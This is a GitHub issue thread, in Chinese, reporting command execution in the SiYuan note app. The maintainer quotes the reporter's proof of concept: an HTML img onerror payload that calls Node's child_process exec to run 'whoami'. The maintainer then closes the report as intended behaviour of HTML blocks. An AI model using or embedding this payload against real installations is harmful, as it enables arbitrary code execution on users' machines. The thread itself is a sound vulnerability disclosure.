### ISSUE TITLE
最新版中各平台(Windows、Mac等)均存在漏洞导致执行系统命令

### ISSUE THREAD

**Issue by 13l00m** [siyuan-note/siyuan#7875]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Can the issue be reproduced with the default theme (daylight/midnight)?

- [x] I was able to reproduce the issue with the default theme

### Could the issue be due to extensions?

- [X] I've ruled out the possibility that the extension is causing the problem.

### Describe the problem

最新版中各平台(Windows、Mac等)均存在漏洞导致执行系统命令，详细信息已发送至相关邮箱

### Expected result

命令执行

### Version environment

```markdown
- Version: Windows、MAC
- Operating System: 
- Browser (if used):
```

### Log file

none

**Comment by 88250** [comment]
感谢反馈，转发一下你发的邮件内容：

```
<div>
<img src=13l00m onerror="const shell = require('child_process').exec;shell('whoami').stdout.on('data', function (data) {alert(data);})">
</div>
```

从设计上来说，HTML 块是允许执行任意脚本的。同时，我们也在用户指南文档中对此进行了安全相关注意事项描述：

![image](https://user-images.githubusercontent.com/873584/229683035-a5d44a15-584b-43d1-beb1-c46c9920b8a6.png)

所以这个问题暂时不考虑解决了，感谢反馈。

**Comment by 88250** [comment]
关联 https://github.com/siyuan-note/siyuan/issues/4274
